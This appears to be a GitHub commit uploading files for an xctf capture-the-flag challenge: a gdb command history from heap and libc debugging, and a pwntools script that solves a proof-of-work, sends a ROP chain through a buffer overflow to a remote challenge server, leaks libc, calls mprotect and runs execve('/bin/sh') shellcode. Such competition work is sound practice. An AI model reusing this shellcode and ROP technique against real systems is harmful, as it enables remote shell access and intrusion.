Upload xctf_ctf

st424204 · Apr 26, 2018 · 4ac7ffa · 4ac7ffa
1 parent f71bdbc
commit 4ac7ffa
Show file tree

Hide file tree

Showing 19 changed files with 1,299 additions and 0 deletions.
diff --git a/xctf_ctf/.gdb_history b/xctf_ctf/.gdb_history
@@ -0,0 +1,222 @@
+vmmap 
+r
+vmmap 
+c
+x/gx 0x6020c0
+x/10gx 0x00007ffff7ef2010
+x/10gx 0x00007ffff7ef2010-0x10
+c
+x/10gx 0x00007ffff7ef2010-0x10
+x/100gx 0x00007ffff7ef2010-0x10
+x/gx 0x6020c0
+x/10gx 0x6020c0
+c
+x/100gx 0x00007ffff7ef2010-0x10
+c
+p bins_ptr 
+vmmap 
+p &bins_ptr 
+x/gx 0x7ffff7dd6040
+x/10gx 0x7ffff7dd6040
+x/s 0x7ffff7dd6048
+x/gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ff2000
+p/d 0x1000
+r
+x/10gx 0x6020c0
+x/10gx 
+x/10gx 0x00007ffff7ef2010
+x/10gx 0x00007ffff7ef2010-0x10
+x/1000gx 0x00007ffff7ef2010-0x10
+x/100gx 0x00007ffff7ef2f10-0x10
+r
+x/10gx 0x6020c0
+x/10gx 0x00007ffff7ef2010
+x/10gx 0x00007ffff7ef2010-0x10
+c
+x/10gx 0x00007ffff7ef2010-0x10
+p bins_ptr 
+p (long long)bins_ptr 
+p &bins_ptr 
+x/gx 0x7ffff7dd6040
+x/gx 0x00007ffff7ff2000
+x/gx 0x00007ffff7ff2000-0x20
+x/10gx 0x00007ffff7ff2000
+c
+x/10gx 0x00007ffff7ff2000
+r
+x/10gx 0x00007ffff7ff2000
+c
+x/10gx 0x00007ffff7ff2000
+c
+x/10gx 0x00007ffff7ff2000
+x/gx 0x00007ffff7ef2000
+x/10gx 0x00007ffff7ef2000
+r
+r
+x/10gx 0x00007ffff7ef2000
+x/10gx 0x00007ffff7ef2000
+x/10gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ef2050
+x/10gx 0x00007ffff7ef2000
+r
+x/10gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ef2000
+r
+p &bins_ptr 
+x/gx &bins_ptr 
+x/gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ef2080
+x/10gx 0x00007ffff7ff2000
+x/10gx 0x00007ffff7ef2040
+vmmap 
+checksec 
+got
+set {long long}0x7ffff7ef2050=0x0602038
+c
+x/10gx 0x00007ffff7ff2000
+c
+r
+attach 14428
+x/gx &bins_ptr 
+x/10gx 0x00007f17ac282000
+x/10gx 0x00007f17ac182000
+attach 14459
+x/gx &bins_ptr 
+x/gx0x00007fe9820ea000 
+x/10gx 0x00007fe981fea000
+attach 14514
+x/gx &bins_ptr 
+x/gx 0x00007f58ad3ad000 
+x/10gx 0x00007f58ad2ad000
+attach 14645
+x/gx &bins_ptr 
+x/gx 0x00007f5fd5a5b000
+x/10gx 0x00007f5fd595b000
+got
+attach 14725
+x/gx &bins_ptr 
+x/gx 0x00007f26cbb0d000
+x/10gx0x00007f26cba0d000
+x/30gx 0x00007f26cba0d000
+attach 14775
+x/gx &bins_ptr 
+x/gx 0x00007f9bb0bba000
+x/30gx 0x00007f9bb0aba020
+vmmap 
+p 0x00007f9bb0aba370-0x00007f9bb03cd000
+attach 14819
+x/gx &bins_ptr 
+x/gx 0x00007ff693adf000
+x/gx 0x00007ff6939df020
+x/10gx 0x00007ff6939df000
+libc
+p 0x00007ff6939df370-0x7ff6932f2000
+attach 14843
+vmmap 
+x/10gx 0x00602000
+x/10gx 0x6020c0
+x/10gx 0x00007f7fde178030
+attach 14923
+x/10gx 0x6020c0
+x/10gx 0x00007fabfe674010
+got
+attach 14985
+x/10gx 0x6020c0
+x/10gx 0x00007f7c4f162030
+x/10gx 0x00007f7c4f162000
+x/30gx 0x00007f7c4f162000
+set {long long}0x7f7c4f162008=0x27
+x/30gx 0x00007f7c4f162000
+c
+attach 15014
+x/30gx 0x00007f7c4f162000
+x/10gx 0x6020c0
+x/10gx 
+x/10gx 0x00007f41a4731000
+set {long long}0x7f41a4731008=0x2f
+x/10gx 0x00007f41a4731000
+c
+attach 15312
+x/10gx 0x6020c0
+x/10gx 0x00007f752a438030
+x/100gx 0x00007f752a438000
+x/50gx 0x00007f752a438000
+x/gx &bins_ptr 
+x/10gx 0x00007f752a538000
+attach 15459
+heapinfo
+x/10gx 0x6020c0
+x/10gx 0x00007fe63c947000
+x/100gx 0x00007fe63c947000
+attach 15592
+x/10gx 0x6020c0
+x/10gx 0x00007faa909d1000
+x/100gx 0x00007faa909d1000
+attach 15653
+x/10gx 0x6020c0
+x/10gx 0x00007fa1c0c50010
+x/100gx 0x00007fa1c0c50010
+attach 15714
+x/10gx 0x6020c0
+x/100gx 0x00007f30d5458010
+x/100gx 0x00007f30d5458000
+att 15756
+x/10gx 0x6020c0
+x/100gx 0x00007f2f05c09000
+attach 15792
+x/10gx 0x6020c0
+x/100gx 0x00007f44c988e000
+att 15840
+heapinfo
+x/10gx 0x6020c0
+x/100gx 0x00007f748b769000
+attach 15913
+heapinfo
+x/10gx 0x6020c0
+x/10gx 0x00007f3829ddf000
+x/100gx 0x00007f3829ddf000
+attach 16000
+x/10gx 0x6020c0
+x/100gx 0x00007f79d95ba000
+attach 16030
+x/10gx 0x6020c0
+x/10gx 0x00007fb78e8f6000
+x/gx &bins_ptr 
+x/10gx 0x00007fb78e9f6000
+x/100gx 0x00007fb78e9f6000
+attach 16085
+x/10gx 0x6020c0
+x/10gx 0x00007fd16f99d000
+attach 16097
+x/10gx 0x6020c0
+x/100gx 0x00007f681c45e000
+attach 16135
+x/10gx 0x6020c0
+x/10gx 0x00007fdab4c31000
+x/100gx 0x7fdab4c31000
+r
+x/gx 0x6020c0
+r
+x/gx 0x6020c0
+x/gx 0x6020b8
+x/2gx 0x6020b8
+x/2gx 0x6020b8+0x5
+attach 16205
+x/gx &bins_ptr 
+x/100gx 0x00007f1f8ec59000
+x/10gx 0x00000000006020bd
+x/10gx 0x6020c0
+x/10gx 0x6020c0-0x10
+x/2gx 0x6020e0+0x5
+attach 16301
+x/10gx 0x6020c0
+got
+attach 16436
+p puts
+p &puts-$libc
+libc
+p &puts-$libc
+p &system-$libc
+got
diff --git a/xctf_ctf/bs/bs b/xctf_ctf/bs/bs
diff --git a/xctf_ctf/bs/bs.py b/xctf_ctf/bs/bs.py
@@ -0,0 +1,109 @@
+from pwn import *
+import hashlib
+from string import digits,letters
+import random
+
+
+context.arch = "amd64"
+
+#r = process(["./bs"])
+
+r = remote("47.91.226.78", 10005)
+
+
+data = r.recvline()
+substr = data.split(')')[0].split('+')[1]
+ans = data.split()[-1].strip()
+
+total = digits+letters
+total*=4
+total = list(total)
+print total
+count = 0
+while True:
+	count +=1
+	if count %10000 == 0:
+		print count
+	sol = "".join(random.sample(total,4))
+	if hashlib.sha256( sol+substr).hexdigest() == ans:
+		print "OK"
+		r.sendline(sol)
+		break
+
+
+
+
+
+
+addr = 0x00602100
+
+
+
+
+shell=asm("""
+mov rbx,0x0068732f6e69622f
+push rbx
+push rsp
+pop rdi
+xor rsi,rsi
+push rsi
+pop rdx
+push rdx
+pop rax
+mov al,0x3b
+syscall
+mov al,0x3c
+xor rdi,rdi
+syscall
+""")
+
+
+#0x0000000000400c03 : pop rdi ; ret
+
+payload = flat([
+0x400c03,
+0x601fb0,
+0x4007c0,
+0x400bfa,
+0x0,
+0x1,
+0x601fd0,
+0x8+len(shell),
+addr,
+0x0,
+0x400be0,
+0x0,
+0x0,
+0x1,
+addr,
+0x7,
+0x1000,
+0x602000,
+0x400be0,
+0x0,
+0x0,
+0x0,
+0x0,
+0x0,
+0x0,
+0x0,
+addr+0x8
+])
+
+payload = "a"*0x1018+payload
+payload = payload.ljust(0x1800,'a')
+
+r.sendlineafter("?",str(len(payload)))
+r.send(payload)
+
+r.recvline()
+r.recvline()
+
+libc = u64(r.recvline()[:-1].ljust(8,'\x00'))-0x6f690
+mprotect = 0x101770+libc
+print hex(libc)
+
+
+r.send(p64(mprotect)+shell)
+
+r.interactive()
diff --git a/xctf_ctf/bs/libc.so.6 b/xctf_ctf/bs/libc.so.6